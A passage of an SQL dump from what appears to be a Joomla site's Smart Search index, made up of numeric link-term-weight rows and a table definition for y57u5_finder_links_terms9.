(308, 320133, 1.02669),
(298, 320134, 1.12),
(308, 320134, 1.12),
(298, 320135, 0.42),
(308, 320135, 0.42),
(298, 320136, 1.02669),
(308, 320136, 1.02669),
(298, 320137, 1.21331),
(298, 320138, 0.95669),
(308, 320138, 0.95669),
(298, 320139, 1.07331),
(308, 320139, 1.07331),
(298, 320140, 1.05),
(308, 320140, 1.05),
(298, 320141, 1.14331),
(308, 320141, 1.14331),
(298, 320142, 0.98),
(308, 320142, 0.98),
(298, 320143, 1.07331),
(308, 320143, 1.07331),
(298, 320144, 1.05),
(308, 320144, 1.05),
(298, 320145, 1.12),
(308, 320145, 1.12),
(298, 320146, 1.12),
(308, 320146, 1.12),
(298, 320147, 1.23669),
(308, 320147, 1.23669),
(298, 320148, 0.93331),
(308, 320148, 0.93331),
(298, 320149, 0.98),
(308, 320149, 0.98),
(298, 320150, 0.93331),
(308, 320150, 0.93331),
(298, 320151, 1.07331),
(308, 320151, 1.07331),
(298, 320152, 0.98),
(298, 320153, 1.21331),
(298, 320154, 0.46669),
(308, 320154, 0.46669),
(298, 320155, 1.05),
(308, 320155, 1.05),
(298, 320156, 1.28331),
(308, 320156, 1.28331),
(298, 320157, 0.98),
(308, 320157, 0.98),
(298, 320158, 1.26),
(308, 320158, 1.26),
(298, 320159, 0.98),
(308, 320159, 0.98),
(298, 320160, 1.07331),
(308, 320160, 1.07331),
(298, 320161, 1.02669),
(308, 320161, 1.02669),
(298, 320162, 1.12),
(308, 320162, 1.12),
(298, 320163, 0.98),
(308, 320163, 0.98),
(298, 320164, 1.07331),
(308, 320164, 1.07331),
(298, 320165, 1.07331),
(298, 320166, 1.35331),
(298, 320195, 1.00331),
(308, 320195, 1.00331),
(298, 320196, 0.51331),
(308, 320196, 0.51331),
(298, 320197, 1.05),
(308, 320197, 1.05),
(298, 320198, 1.26),
(308, 320198, 1.26),
(298, 320199, 0.91),
(308, 320199, 0.91),
(298, 320200, 0.98),
(308, 320200, 0.98),
(298, 320201, 1.09669),
(308, 320201, 1.09669),
(298, 320202, 0.91),
(308, 320202, 0.91),
(298, 320203, 1.09669),
(308, 320203, 1.09669),
(298, 320204, 1.00331),
(308, 320204, 1.00331),
(304, 320205, 1.00331),
(298, 320205, 5.44654),
(308, 320205, 5.44654),
(298, 320206, 1.26),
(304, 320206, 1.26),
(308, 320206, 1.26),
(298, 320207, 1.16669),
(308, 320207, 1.16669),
(298, 320208, 3.11661),
(308, 320208, 3.11661),
(298, 320209, 1.23669),
(308, 320209, 1.23669),
(298, 320210, 0.46669),
(308, 320210, 0.46669),
(298, 320211, 1.07331),
(308, 320211, 1.07331),
(298, 320212, 1.28331),
(308, 320212, 1.28331),
(298, 320213, 1.09669),
(304, 320213, 1.09669),
(308, 320213, 1.09669),
(298, 320214, 1.16669),
(304, 320214, 1.16669),
(308, 320214, 1.16669),
(298, 320215, 0.28),
(308, 320215, 0.28),
(298, 320216, 0.91),
(308, 320216, 0.91),
(298, 320217, 1.00331),
(308, 320217, 1.00331),
(298, 320218, 0.98),
(308, 320218, 0.98),
(298, 320219, 0.93331),
(308, 320219, 0.93331),
(298, 320220, 1.02669),
(308, 320220, 1.02669),
(298, 320221, 1.07331),
(308, 320221, 1.07331),
(298, 320222, 1.19),
(308, 320222, 1.19),
(298, 320223, 0.91),
(308, 320223, 0.91),
(298, 320224, 1.12),
(308, 320224, 1.12),
(298, 320225, 2.4666),
(298, 320226, 3.2666),
(298, 320229, 2.6666),
(298, 320230, 0.98),
(308, 320230, 0.98),
(298, 320231, 1.07331),
(308, 320231, 1.07331),
(298, 320291, 0.37331),
(304, 320291, 0.37331),
(298, 320292, 1.05),
(298, 320293, 1.28331),
(298, 320294, 1.14331),
(308, 320294, 1.14331),
(298, 320295, 1.09669),
(308, 320295, 1.09669),
(298, 320296, 1.21331),
(308, 320296, 1.21331),
(298, 320297, 0.93331),
(308, 320297, 0.93331),
(298, 320298, 1.16669),
(308, 320298, 1.16669),
(298, 320299, 1.14331),
(308, 320299, 1.14331),
(299, 320838, 0.91),
(299, 320839, 1.05),
(299, 320840, 0.95669),
(299, 320841, 1.07331),
(299, 320842, 0.18669),
(299, 320843, 0.88669),
(299, 320844, 1.02669),
(299, 320845, 1.05),
(299, 320846, 0.84),
(299, 320847, 0.93331),
(299, 320848, 1.77338),
(299, 320849, 0.95669),
(299, 320850, 1.00331),
(299, 320851, 0.86331),
(299, 320852, 0.98),
(299, 320853, 1.05),
(299, 320854, 2.05338),
(299, 320855, 0.95669),
(299, 320856, 0.95669),
(299, 320857, 0.95669),
(299, 320858, 0.95669),
(299, 320859, 0.95669),
(299, 320860, 1.05),
(299, 320861, 1.00331),
(299, 320862, 1.07331),
(299, 320863, 0.93331),
(299, 320864, 1.05),
(299, 320865, 0.93331),
(299, 320866, 1.00331),
(299, 320867, 0.88669),
(299, 320868, 0.93331),
(299, 320877, 1.05),
(299, 320878, 1.14331),
(299, 320879, 1.77338),
(299, 320880, 1.00331),
(299, 320881, 1.02669),
(299, 320882, 0.98),
(299, 320883, 1.07331),
(299, 320884, 0.28),
(299, 320885, 0.95669),
(299, 320886, 1.05),
(299, 320887, 1.05),
(299, 320888, 1.14331),
(299, 320889, 0.93331),
(299, 320890, 0.91),
(299, 320891, 0.91),
(299, 320892, 1.00331),
(299, 320893, 0.91),
(299, 320894, 0.98),
(299, 320895, 0.88669),
(299, 320896, 0.98),
(299, 320897, 1.00331),
(299, 320898, 0.32669),
(299, 320899, 0.93331),
(299, 320900, 1.02669),
(299, 320901, 1.09669),
(299, 320902, 0.95669),
(299, 320903, 1.09669),
(299, 320904, 0.28),
(299, 320905, 1.09669),
(299, 320906, 1.16669),
(299, 320907, 0.95669),
(299, 320908, 1.05),
(299, 320909, 0.98),
(299, 320910, 1.05),
(299, 320911, 0.98),
(299, 320993, 0.88669),
(299, 320994, 1.02669),
(299, 320995, 0.93331),
(299, 320996, 1.02669),
(299, 320997, 0.91),
(299, 320998, 1.00331),
(299, 320999, 0.95669),
(299, 321000, 1.09669),
(299, 321001, 0.86331),
(299, 321002, 0.93331),
(299, 321003, 0.86331),
(299, 321004, 0.95669),
(299, 321005, 0.81669),
(299, 321006, 0.98),
(299, 321007, 0.84),
(299, 321008, 0.93331),
(299, 321009, 0.86331),
(299, 321010, 1.00331),
(299, 321011, 0.84),
(299, 321012, 0.88669),
(299, 321013, 0.46669),
(299, 321014, 1.02669),
(299, 321015, 1.12),
(299, 321016, 1.00331),
(299, 321017, 0.98),
(299, 321018, 0.84),
(299, 321019, 0.95669),
(299, 321020, 0.93331),
(299, 321021, 0.88669),
(299, 321022, 1.02669),
(299, 321023, 0.98),
(299, 321024, 0.51331),
(299, 321025, 1.02669),
(299, 321026, 1.14331),
(299, 321027, 0.95669),
(299, 321028, 1.23669),
(299, 321029, 1.05),
(299, 321030, 1.16669),
(299, 321031, 1.35331),
(299, 321032, 0.98),
(299, 321033, 1.12),
(299, 321034, 0.51331),
(299, 321035, 1.19),
(299, 321036, 1.26),
(299, 321037, 1.00331),
(299, 321038, 0.93331),
(299, 321039, 0.88669),
(299, 321040, 7.98),
(299, 321041, 9.12),
(299, 321042, 0.86331),
(299, 321043, 0.98),
(299, 321044, 0.93331),
(299, 321045, 0.93331),
(299, 321046, 1.77338),
(299, 321047, 0.98),
(299, 321048, 0.95669),
(299, 321049, 1.00331),
(299, 321050, 0.91),
(299, 321051, 0.98),
(299, 321052, 0.91),
(299, 321053, 1.02669),
(299, 321054, 0.81669),
(299, 321055, 1.00331),
(299, 321056, 0.84),
(299, 321057, 0.91),
(299, 321058, 2.4),
(299, 321059, 2.6666),
(299, 321091, 2.6),
(299, 321092, 1.00331),
(299, 321093, 1.05),
(299, 321094, 1.14331),
(299, 321095, 1.12),
(299, 321263, 0.95669),
(299, 321264, 1.12),
(299, 321265, 0.98),
(299, 321266, 1.21331),
(299, 321267, 0.32669),
(299, 321268, 0.93331),
(299, 321269, 1.05),
(299, 321270, 0.91),
(306, 321270, 0.91),
(299, 321271, 1.00331),
(306, 321271, 1.00331),
(299, 321272, 0.95669),
(299, 321273, 1.02669),
(299, 321274, 1.05),
(299, 321275, 1.14331),
(299, 321276, 2.00662),
(299, 321277, 2.19338),
(299, 321278, 3.21993),
(299, 321279, 1.26),
(299, 321280, 1.19),
(299, 321281, 1.14331),
(299, 321282, 0.51331),
(299, 321283, 1.14331),
(299, 321284, 1.26),
(299, 321285, 1.00331),
(299, 321286, 1.07331),
(299, 321287, 0.91),
(299, 321288, 1.07331),
(299, 321289, 1.00331),
(299, 321290, 1.05),
(299, 321291, 0.42),
(299, 321292, 0.98),
(299, 321293, 1.07331),
(299, 321294, 0.98),
(299, 321295, 1.09669),
(299, 321296, 0.42),
(299, 321297, 1.00331),
(299, 321298, 1.12),
(299, 321299, 0.37331),
(299, 321300, 0.98),
(299, 321301, 1.07331),
(299, 321302, 0.28),
(299, 321303, 0.91),
(299, 321304, 0.98),
(301, 322736, 2.4666),
(301, 322737, 2.8),
(301, 322738, 2.6666),
(304, 324818, 0.86331),
(304, 324819, 0.95669),
(304, 324959, 0.98),
(304, 324960, 1.16669),
(304, 324961, 1.00331),
(304, 324962, 1.09669),
(304, 324963, 0.98),
(304, 324964, 1.07331),
(304, 324965, 0.28),
(304, 324966, 0.95669),
(304, 324967, 1.12),
(304, 324968, 1.26),
(304, 324969, 1.09669),
(304, 324970, 1.14331),
(304, 324971, 0.98),
(304, 324972, 1.14331),
(304, 324973, 0.86331),
(304, 324974, 0.98),
(304, 324975, 0.95669),
(306, 324975, 0.95669),
(304, 324976, 0.98),
(304, 324977, 1.09669),
(304, 324978, 1.00331),
(304, 324979, 1.16669),
(304, 324980, 1.00331),
(304, 325000, 0.95669),
(304, 325001, 1.00331),
(304, 325002, 0.32669),
(304, 325003, 1.02669),
(304, 325004, 1.09669),
(304, 325005, 1.02669),
(304, 325006, 1.21331),
(304, 325007, 1.07331),
(304, 325008, 1.19),
(304, 325009, 0.91),
(304, 325010, 0.98),
(304, 325011, 0.86331),
(304, 325012, 0.95669),
(304, 325013, 0.93331),
(304, 325014, 1.00331),
(304, 325015, 0.95669),
(304, 325016, 0.98),
(304, 325017, 1.09669),
(304, 325018, 0.88669),
(304, 325019, 0.98),
(304, 325020, 0.37338),
(304, 325021, 1.91338),
(304, 325022, 2.05338),
(304, 325023, 1.00331),
(304, 325024, 1.05),
(304, 325025, 1.30669),
(304, 325026, 0.95669),
(304, 325084, 0.81669),
(304, 325085, 0.91),
(304, 325086, 0.93331),
(304, 325087, 0.93331),
(304, 325088, 1.00331),
(304, 325089, 1.02669),
(304, 325090, 1.00331),
(304, 325091, 0.98),
(304, 325092, 1.12),
(304, 325093, 0.93331),
(304, 325094, 1.14331),
(304, 325095, 1.02669),
(304, 325096, 0.93331),
(304, 325097, 1.02669),
(304, 325098, 0.88669),
(304, 325099, 1.05),
(304, 325100, 0.88669),
(304, 325101, 1.16669),
(304, 325102, 0.91),
(304, 325103, 0.95669),
(304, 325104, 0.93331),
(304, 325105, 1.05),
(304, 325106, 0.84),
(306, 325106, 1.68),
(304, 325107, 1.12),
(304, 325108, 1.02669),
(304, 325109, 0.95669),
(304, 325110, 0.86331),
(304, 325111, 0.95669),
(304, 325112, 0.93331),
(304, 325113, 1.12),
(304, 325114, 1.00331),
(304, 325115, 1.07331),
(304, 325116, 0.88669),
(304, 325117, 0.95669),
(304, 325118, 0.93331),
(304, 325119, 1.05),
(304, 325120, 0.86331),
(304, 325121, 0.93331),
(304, 325122, 1.00331),
(304, 325123, 2.4666),
(304, 325124, 2.8),
(304, 325135, 2.6666),
(304, 325136, 0.86331),
(306, 325136, 0.86331),
(304, 325137, 0.98),
(304, 325138, 1.02669),
(304, 325250, 0.93331),
(304, 325251, 1.02669),
(304, 325252, 0.93331),
(304, 325253, 1.12),
(304, 325254, 0.98),
(304, 325255, 1.14331),
(304, 325256, 0.93331),
(304, 325257, 1.07331),
(304, 325258, 1.12),
(304, 325259, 0.93331),
(304, 325260, 1.09669),
(304, 325261, 1.09669),
(304, 325262, 0.91),
(306, 325262, 0.91),
(304, 325263, 1.05),
(304, 325264, 0.95669),
(304, 325265, 1.05),
(304, 325266, 1.12),
(304, 325267, 0.88669),
(304, 325268, 0.95669),
(304, 325269, 0.93331),
(304, 325270, 1.02669),
(304, 325271, 0.86331),
(304, 325272, 1.02669),
(304, 325273, 0.28),
(304, 325274, 1.02669),
(304, 325275, 1.12),
(304, 325276, 1.09669),
(304, 325277, 1.14331),
(304, 325278, 0.7),
(304, 325279, 1.23669),
(304, 325280, 1.37669),
(304, 325281, 0.37331),
(304, 325282, 1.07331),
(304, 325283, 1.30669),
(304, 325284, 1.09669),
(304, 325285, 1.05),
(304, 325286, 1.09669),
(305, 325845, 0.79331),
(305, 325846, 0.88669),
(305, 326034, 1.02669),
(305, 326035, 1.09669),
(305, 326036, 0.88669),
(305, 326037, 0.98),
(305, 326038, 0.93331),
(305, 326039, 1.02669),
(305, 326040, 0.84),
(305, 326041, 1.14331),
(305, 326042, 1.00331),
(305, 326043, 1.14331),
(305, 326044, 1.02669),
(305, 326045, 1.14331),
(305, 326046, 1.12),
(305, 326047, 1.19),
(305, 326048, 1.05),
(305, 326049, 0.95669),
(305, 326050, 1.05),
(305, 326051, 0.95669),
(305, 326052, 1.16669),
(305, 326053, 1.09669),
(305, 326054, 0.95669),
(305, 326055, 1.00331),
(305, 326056, 1.91338),
(305, 326057, 1.07331),
(305, 326058, 1.26),
(305, 326059, 1.19),
(305, 326060, 1.30669),
(305, 326061, 1.37669),
(305, 326062, 0.86331),
(305, 326063, 0.88669),
(305, 326064, 1.00331),
(305, 326065, 1.05),
(305, 326066, 2.05338),
(305, 326067, 1.00331),
(305, 326068, 0.95669),
(305, 326069, 1.00331),
(305, 326070, 1.09669),
(305, 326071, 1.05),
(305, 326072, 1.21331),
(305, 326073, 0.95669),
(305, 326074, 0.93331),
(305, 326075, 1.05),
(305, 326076, 0.95669),
(305, 326077, 0.98),
(305, 326078, 1.07331),
(305, 326079, 0.98),
(305, 326080, 0.98),
(305, 326081, 1.07331),
(305, 326082, 1.02669),
(305, 326083, 1.02669),
(305, 326084, 0.95669),
(305, 326085, 1.05),
(305, 326104, 0.23331),
(305, 326105, 0.91),
(305, 326106, 1.02669),
(305, 326107, 0.86331),
(305, 326108, 0.98),
(305, 326109, 0.95669),
(305, 326110, 1.02669),
(305, 326111, 0.98),
(305, 326112, 1.91338),
(305, 326113, 1.02669),
(305, 326114, 1.02669),
(305, 326115, 1.14331),
(305, 326116, 0.88669),
(305, 326117, 0.95669),
(305, 326118, 0.28),
(305, 326119, 0.93331),
(305, 326120, 1.00331),
(305, 326121, 0.32669),
(305, 326122, 0.93331),
(305, 326123, 1.09669),
(305, 326124, 0.86331),
(305, 326125, 0.98),
(305, 326126, 1.16669),
(305, 326127, 1.02669),
(305, 326205, 0.95669),
(305, 326206, 0.84),
(305, 326207, 0.88669),
(305, 326208, 0.86331),
(305, 326209, 0.91),
(305, 326210, 0.79331),
(305, 326211, 0.95669),
(305, 326212, 1.86662),
(305, 326213, 1.02669),
(305, 326214, 1.14331),
(305, 326215, 0.37331),
(305, 326216, 1.00331),
(305, 326217, 1.33),
(305, 326218, 1.02669),
(305, 326219, 1.16669),
(305, 326220, 0.95669),
(305, 326221, 1.05),
(305, 326222, 0.95669),
(305, 326223, 1.02669),
(305, 326224, 0.98),
(305, 326225, 1.07331),
(305, 326226, 0.91),
(305, 326227, 0.95669),
(305, 326228, 1.16669),
(305, 326229, 1.07331),
(305, 326230, 1.19),
(305, 326231, 0.98),
(305, 326232, 1.05),
(305, 326233, 1.23669),
(305, 326234, 1.12),
(305, 326235, 2.05338),
(305, 326236, 1.12),
(305, 326237, 1.09669),
(305, 326238, 1.21331),
(305, 326239, 1.4),
(305, 326240, 1.05),
(305, 326241, 1.14331),
(305, 326242, 1.05),
(305, 326243, 0.95669),
(305, 326244, 0.95669),
(305, 326245, 1.00331),
(305, 326246, 1.00331),
(305, 326247, 1.09669),
(305, 326248, 1.09669),
(305, 326249, 0.98),
(305, 326250, 1.12),
(305, 326251, 0.95669),
(305, 326252, 1.05),
(305, 326253, 0.98),
(305, 326254, 1.07331),
(305, 326255, 0.91),
(305, 326256, 1.02669),
(305, 326257, 0.93331),
(305, 326258, 1.19),
(305, 326259, 0.93331),
(305, 326260, 1.02669),
(305, 326261, 0.79331),
(305, 326262, 0.86331),
(305, 326263, 0.86331),
(305, 326264, 0.91),
(305, 326265, 1.02669),
(305, 326266, 1.02669),
(305, 326267, 0.86331),
(305, 326268, 0.93331),
(305, 326269, 0.86331),
(305, 326270, 1.00331),
(305, 326271, 2.4666),
(305, 326272, 2.8),
(305, 326278, 2.6666),
(305, 326279, 0.88669),
(305, 326280, 1.00331),
(305, 326281, 1.21331),
(305, 326282, 0.86331),
(305, 326283, 0.98),
(305, 326284, 1.16669),
(305, 326285, 0.86331),
(305, 326286, 1.02669),
(305, 326287, 0.42),
(306, 326287, 0.42),
(305, 326288, 1.09669),
(305, 326289, 1.19),
(305, 326290, 0.95669),
(305, 326291, 1.05),
(305, 326426, 1.05),
(305, 326427, 1.19),
(305, 326428, 1.07331),
(305, 326429, 1.02669),
(305, 326430, 1.12),
(305, 326431, 0.95669),
(305, 326432, 1.26),
(305, 326433, 0.51331),
(305, 326434, 1.07331),
(305, 326435, 1.23669),
(305, 326436, 0.46669),
(305, 326437, 1.05),
(305, 326438, 1.12),
(305, 326439, 1.02669),
(305, 326440, 1.09669),
(305, 326441, 1.21331),
(305, 326442, 1.00331),
(305, 326443, 1.09669),
(305, 326444, 0.95669),
(305, 326445, 1.07331),
(305, 326446, 1.00331),
(305, 326447, 1.05),
(305, 326448, 0.98),
(305, 326449, 1.05),
(305, 326450, 0.95669),
(305, 326451, 1.02669),
(305, 326452, 1.09669),
(305, 326453, 1.09669),
(306, 327222, 0.77),
(306, 327223, 0.86331),
(306, 327224, 1.19),
(306, 327225, 1.33),
(306, 327226, 1.02669),
(306, 327227, 1.16669),
(306, 327228, 1.07331),
(306, 327229, 1.19),
(306, 327230, 1.07331),
(306, 327231, 0.95669),
(306, 327232, 1.07331),
(306, 327233, 1.05),
(306, 327234, 1.02669),
(306, 327235, 1.05),
(306, 327236, 0.88669),
(306, 327237, 0.98),
(306, 327238, 1.12),
(306, 327239, 1.16669),
(306, 327240, 1.16669),
(306, 327241, 1.12),
(306, 327242, 1.09669),
(306, 327243, 1.19),
(306, 327244, 1.00331),
(306, 327245, 1.09669),
(306, 327246, 1.12),
(306, 327247, 1.19),
(306, 327248, 0.51331),
(306, 327249, 1.02669),
(306, 327250, 1.12),
(306, 327251, 1.07331),
(306, 327252, 1.19),
(306, 327253, 1.00331),
(306, 327254, 1.26),
(306, 327255, 0.42),
(306, 327256, 1.07331),
(306, 327257, 1.16669),
(306, 327258, 0.51331),
(306, 327259, 1.14331),
(306, 327260, 1.26),
(306, 327261, 1.09669),
(306, 327262, 1.35331),
(306, 327263, 1.09669),
(306, 327264, 1.16669),
(306, 327265, 1.07331),
(306, 327266, 1.16669),
(306, 327267, 8.93019),
(306, 327268, 9.87981),
(306, 327269, 0.88669),
(306, 327270, 1.00331),
(306, 327271, 0.93331),
(306, 327272, 0.91),
(306, 327273, 1.07331),
(306, 327274, 2.1),
(306, 327275, 1.00331),
(306, 327276, 0.91),
(306, 327277, 1.02669),
(306, 327278, 0.91),
(306, 327279, 1.14331),
(306, 327280, 1.00331),
(306, 327281, 1.07331),
(306, 327282, 0.98),
(306, 327283, 1.09669),
(306, 327284, 1.02669),
(306, 327285, 0.95669),
(306, 327286, 1.09669),
(306, 327287, 0.95669),
(306, 327288, 0.93331),
(306, 327289, 1.09669),
(306, 327324, 0.09338),
(306, 327325, 0.84),
(306, 327326, 1.02669),
(306, 327327, 0.77),
(306, 327328, 0.86331),
(306, 327329, 0.46669),
(306, 327330, 1.02669),
(306, 327331, 1.26),
(306, 327332, 0.95669),
(306, 327333, 1.05),
(306, 327334, 1.96),
(306, 327335, 1.77338),
(306, 327336, 1.00331),
(306, 327337, 0.98),
(306, 327338, 1.00331),
(306, 327339, 1.00331),
(306, 327340, 1.07331),
(306, 327341, 1.19),
(306, 327342, 0.98),
(306, 327343, 1.05),
(306, 327344, 1.02669),
(306, 327345, 0.95669),
(306, 327346, 1.05),
(306, 327347, 0.91),
(306, 327348, 1.00331),
(306, 327349, 0.46669),
(306, 327350, 1.00331),
(306, 327351, 1.09669),
(306, 327352, 1.16669),
(306, 327353, 0.91),
(306, 327354, 1.16669),
(306, 327355, 1.09669),
(306, 327356, 1.16669),
(306, 327357, 1.02669),
(306, 327358, 1.12),
(306, 327359, 0.18669),
(306, 327360, 0.88669),
(306, 327361, 1.00331),
(306, 327362, 0.84),
(306, 327363, 0.98),
(306, 327364, 1.00331),
(306, 327365, 1.00331),
(306, 327366, 1.19),
(306, 327367, 0.93331),
(306, 327368, 1.02669),
(306, 327369, 0.86331),
(306, 327370, 1.02669),
(306, 327371, 0.93331),
(306, 327372, 1.02669),
(306, 327373, 1.72662),
(306, 327374, 1.07331),
(306, 327375, 0.93331),
(306, 327376, 0.93331),
(306, 327377, 0.98),
(306, 327378, 0.93331),
(306, 327379, 0.98),
(306, 327380, 0.88669),
(306, 327381, 0.95669),
(306, 327382, 0.95669),
(306, 327383, 0.84),
(306, 327384, 0.95669),
(306, 327385, 1.02669),
(306, 327386, 1.00331),
(306, 327387, 0.91),
(306, 327388, 0.93331),
(306, 327389, 0.28),
(306, 327390, 0.95669),
(306, 327391, 1.05),
(306, 327392, 1.07331),
(306, 327393, 1.07331),
(306, 327394, 0.18669),
(306, 327395, 0.88669),
(306, 327396, 1.07331),
(306, 327397, 1.14331),
(306, 327398, 0.46662),
(306, 327399, 0.91),
(306, 327400, 1.05),
(306, 327401, 0.91),
(306, 327402, 1.16669),
(306, 327585, 1.02669),
(306, 327586, 0.77),
(306, 327587, 0.81669),
(306, 327588, 0.81669),
(306, 327589, 0.95669),
(306, 327590, 0.86331),
(306, 327591, 0.93331),
(306, 327592, 1.05),
(306, 327593, 0.88669),
(306, 327594, 1.02669),
(306, 327595, 0.84),
(306, 327596, 0.93331),
(306, 327597, 1.00331),
(306, 327598, 1.00331),
(306, 327599, 0.84),
(306, 327600, 0.91),
(306, 327601, 0.86331),
(306, 327602, 0.93331),
(306, 327603, 0.95669),
(306, 327604, 0.95669),
(306, 327605, 0.86331),
(306, 327606, 0.98),
(306, 327607, 0.86331),
(306, 327608, 0.98),
(306, 327609, 1.68),
(306, 327610, 1.00331),
(306, 327611, 0.91),
(306, 327612, 0.88669),
(306, 327613, 0.91),
(306, 327614, 0.81669),
(306, 327615, 1.02669),
(306, 327616, 1.00331),
(306, 327617, 1.33),
(306, 327618, 1.09669),
(306, 327619, 1.02669),
(306, 327620, 0.86331),
(306, 327621, 0.93331),
(306, 327622, 0.88669),
(306, 327623, 1.00331),
(306, 327624, 0.93331),
(306, 327625, 1.09669),
(306, 327626, 0.91),
(306, 327627, 1.00331),
(306, 327628, 0.95669),
(306, 327629, 1.07331),
(306, 327630, 0.91),
(306, 327631, 1.00331),
(306, 327632, 1.12),
(306, 327633, 0.95669),
(306, 327634, 1.00331),
(306, 327635, 1.12),
(306, 327636, 0.98),
(306, 327637, 1.09669),
(306, 327638, 0.86331),
(306, 327639, 1.02669),
(306, 327640, 1.05),
(306, 327641, 1.16669),
(306, 327642, 1.05),
(306, 327643, 1.19),
(306, 327644, 0.74662),
(306, 327645, 1.05),
(306, 327646, 1.16669),
(306, 327647, 1.00331),
(306, 327648, 1.09669),
(306, 327649, 0.93338),
(306, 327650, 2.00662),
(306, 327651, 1.16669),
(306, 327652, 1.14331),
(306, 327653, 0.28),
(306, 327654, 0.88669),
(306, 327655, 1.07331),
(306, 327656, 0.93331),
(306, 327657, 1.00331),
(306, 327658, 0.98),
(306, 327659, 1.09669),
(306, 327660, 1.02669),
(306, 327661, 0.95669),
(306, 327662, 0.93331),
(306, 327663, 1.00331),
(306, 327664, 1.07331),
(306, 327665, 1.86662),
(306, 327666, 0.98),
(306, 327667, 0.98),
(306, 327668, 0.98),
(306, 327669, 0.88669),
(306, 327670, 0.95669),
(306, 327671, 1.16669),
(306, 327672, 1.02669),
(306, 327673, 1.00331),
(306, 327674, 1.05),
(306, 327675, 1.72662),
(306, 327676, 2.19338),
(306, 327677, 1.02669),
(306, 327678, 0.86331),
(306, 327679, 1.02669),
(306, 327680, 1.16669),
(306, 327681, 0.23331),
(306, 327682, 1.00331),
(306, 327683, 1.07331),
(306, 327684, 0.32669),
(306, 327685, 0.93331),
(306, 327686, 1.05),
(306, 327687, 0.98),
(306, 327688, 1.09669),
(306, 327689, 0.95669),
(306, 327690, 0.95669),
(306, 327691, 0.93331),
(306, 327692, 0.95669),
(306, 327693, 1.07331),
(306, 327694, 1.02669),
(306, 327695, 0.88669),
(306, 327696, 0.93331),
(306, 327697, 1.02669),
(306, 327698, 1.02669),
(306, 327699, 0.98),
(306, 327700, 1.07331),
(306, 327701, 2.4666),
(306, 327702, 2.9334),
(306, 327718, 2.6666),
(306, 327719, 0.88669),
(306, 327720, 1.00331),
(306, 327721, 0.86331),
(306, 327722, 1.05),
(306, 327723, 1.00331),
(306, 327724, 1.09669),
(306, 327725, 1.02669),
(306, 327726, 1.14331),
(306, 327727, 0.95669),
(306, 327728, 0.95669),
(306, 327729, 1.09669),
(306, 327730, 1.14331),
(306, 327731, 1.02669),
(306, 327732, 1.14331),
(306, 327733, 1.23669),
(306, 327734, 1.07331),
(306, 327735, 1.16669),
(306, 327736, 0.98),
(306, 327737, 1.09669),
(306, 327738, 1.00331),
(306, 327739, 1.09669),
(306, 327952, 0.04669),
(306, 327953, 0.91),
(306, 327954, 1.00331),
(306, 327955, 0.28),
(306, 327956, 0.93331),
(306, 327957, 1.02669),
(306, 327958, 0.18669),
(306, 327959, 0.88669),
(306, 327960, 1.14331),
(306, 327961, 0.86331),
(306, 327962, 1.00331),
(306, 327963, 0.88669),
(306, 327964, 1.12),
(306, 327965, 0.86331),
(306, 327966, 1.02669),
(306, 327967, 1.14331),
(306, 327968, 0.93331),
(306, 327969, 1.00331),
(306, 327970, 0.91),
(306, 327971, 0.98),
(306, 327972, 1.12),
(306, 327973, 0.98),
(306, 327974, 1.09669),
(306, 327975, 1.00331),
(306, 327976, 1.07331),
(306, 327977, 1.09669),
(306, 327978, 1.23669),
(306, 327979, 0.28),
(306, 327980, 0.93331),
(306, 327981, 1.02669),
(306, 327982, 1.02669),
(306, 327983, 1.05),
(306, 327984, 0.23331),
(306, 327985, 0.91),
(306, 327986, 1.05),
(306, 327987, 1.00331),
(306, 327988, 1.05),
(306, 327989, 1.14331),
(306, 327990, 1.07331),
(306, 327991, 0.95669),
(306, 327992, 0.32669),
(306, 327993, 0.95669),
(306, 327994, 1.05),
(306, 327995, 0.18669),
(306, 327996, 0.88669),
(306, 327997, 1.14331),
(306, 327998, 1.09669),
(306, 327999, 0.42),
(306, 328000, 0.95669),
(306, 328001, 1.09669),
(306, 328002, 1.07331),
(306, 328003, 0.93331),
(306, 328004, 1.07331),
(306, 328005, 1.02669),
(306, 328006, 1.12),
(306, 328007, 0.98),
(306, 328008, 1.07331),
(306, 328009, 0.93331),
(306, 328010, 1.02669),
(306, 328011, 0.56),
(306, 328012, 1.09669),
(306, 328013, 1.16669),
(306, 328014, 0.95669),
(306, 328015, 1.02669),
(306, 328016, 1.00331),
(306, 328017, 1.09669),
(306, 328018, 1.82),
(306, 328019, 1.02669),
(306, 328020, 1.02669),
(306, 328021, 1.12),
(306, 328022, 1.91338),
(306, 328023, 1.02669),
(306, 328024, 1.05),
(306, 328025, 0.93331),
(306, 328026, 1.02669),
(306, 328027, 0.46669),
(306, 328028, 1.07331),
(306, 328029, 1.28331),
(306, 328030, 1.02669),
(306, 328031, 1.14331),
(306, 328032, 0.93331),
(306, 328033, 1.07331),
(306, 328034, 0.86331),
(306, 328035, 0.93331),
(308, 328925, 1.07331),
(308, 328926, 0.84),
(308, 328927, 1.02669),
(308, 328928, 0.86331),
(308, 328929, 1.07331),
(308, 328934, 2.4666),
(308, 328935, 3.2666),
(308, 328936, 2.6666),
(308, 328947, 1.05),
(308, 328948, 1.28331);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_links_terms9`
--

CREATE TABLE `y57u5_finder_links_terms9` (
  `link_id` int(10) UNSIGNED NOT NULL,
  `term_id` int(10) UNSIGNED NOT NULL,
  `weight` float UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `y57u5_finder_links_terms9`
--

INSERT INTO `y57u5_finder_links_terms9` (`link_id`, `term_id`, `weight`) VALUES
(301, 49, 0.01169),
(295, 49, 0.02338),
(305, 49, 0.08183),
(233, 49, 0.09331),
(264, 49, 0.09331),
(270, 49, 0.09331),
(287, 49, 0.09331),
(304, 49, 0.09352),
(299, 49, 0.12859),
(31, 49, 0.18662),
(236, 49, 0.18662),
(249, 49, 0.18662),
(250, 49, 0.18662),
(251, 49, 0.18662),
(273, 49, 0.18662),
(274, 49, 0.18662),
(292, 49, 0.18662),
(159, 49, 0.27993),
(245, 49, 0.27993),
(247, 49, 0.27993),
(252, 49, 0.27993),
(267, 49, 0.27993),
(268, 49, 0.27993),
(275, 49, 0.27993),
(290, 49, 0.27993),
(253, 49, 0.37324),
(255, 49, 0.37324),
(258, 49, 0.37324),
(265, 49, 0.37324),
(266, 49, 0.37324),
(168, 49, 0.46655),
(174, 49, 0.46655),
(235, 49, 0.46655),
(237, 49, 0.46655),
(243, 49, 0.46655),
(256, 49, 0.46655),
(259, 49, 0.46655),
(260, 49, 0.46655),
